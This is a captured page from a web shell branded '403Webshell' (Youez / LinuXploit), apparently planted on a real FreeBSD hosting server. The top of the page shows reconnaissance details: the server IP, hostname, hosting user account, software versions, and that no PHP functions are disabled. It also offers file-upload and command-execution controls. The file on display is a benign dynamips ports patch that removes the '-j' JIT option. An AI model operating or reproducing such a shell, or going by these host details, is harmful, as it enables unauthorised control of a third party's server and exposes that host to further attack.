403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.168
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/emulators/dynamips-community/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/emulators/dynamips-community/files/patch-common_dynamips.c
--- common/dynamips.c.orig	2017-07-24 11:37:51 UTC
+++ common/dynamips.c
@@ -190,7 +190,7 @@ static void show_usage(vm_instance_t *vm,int argc,char
           "2691, 3725, 3745, 2600 or 1700) "
           "(default: 7200)\n\n"
           "  -l <log_file>      : Set logging file (default is %s)\n"
-          "  -j                 : Disable the JIT compiler, very slow\n"
+/*          "  -j                 : Disable the JIT compiler, very slow\n" */
           "  --idle-pc <pc>     : Set the idle PC (default: disabled)\n"
           "  --timer-itv <val>  : Timer IRQ interval check (default: %u)\n"
           "\n"
@@ -394,7 +394,7 @@ static vm_instance_t *cli_create_instance(char *name,c
 static int parse_std_cmd_line(int argc,char *argv[])
 {
    char *options_list =
-      "r:o:n:c:m:l:C:i:jt:p:s:k:T:U:A:B:a:f:E:b:S:R:M:eXP:N:G:g:L:I:";
+      "r:o:n:c:m:l:C:i:t:p:s:k:T:U:A:B:a:f:E:b:S:R:M:eXP:N:G:g:L:I:";
    vm_platform_t *platform;
    vm_instance_t *vm = NULL;
    int instance_id;
@@ -563,11 +563,6 @@ static int parse_std_cmd_line(int argc,char *argv[])
             }
 
             printf("Using a clock divisor of %d.\n",vm->clock_divisor);
-            break;
-
-         /* Disable JIT */
-         case 'j':
-            vm->jit_use = FALSE;
             break;
 
          /* VM debug level */

Youez - 2016 - github.com/yon3zu
LinuXploit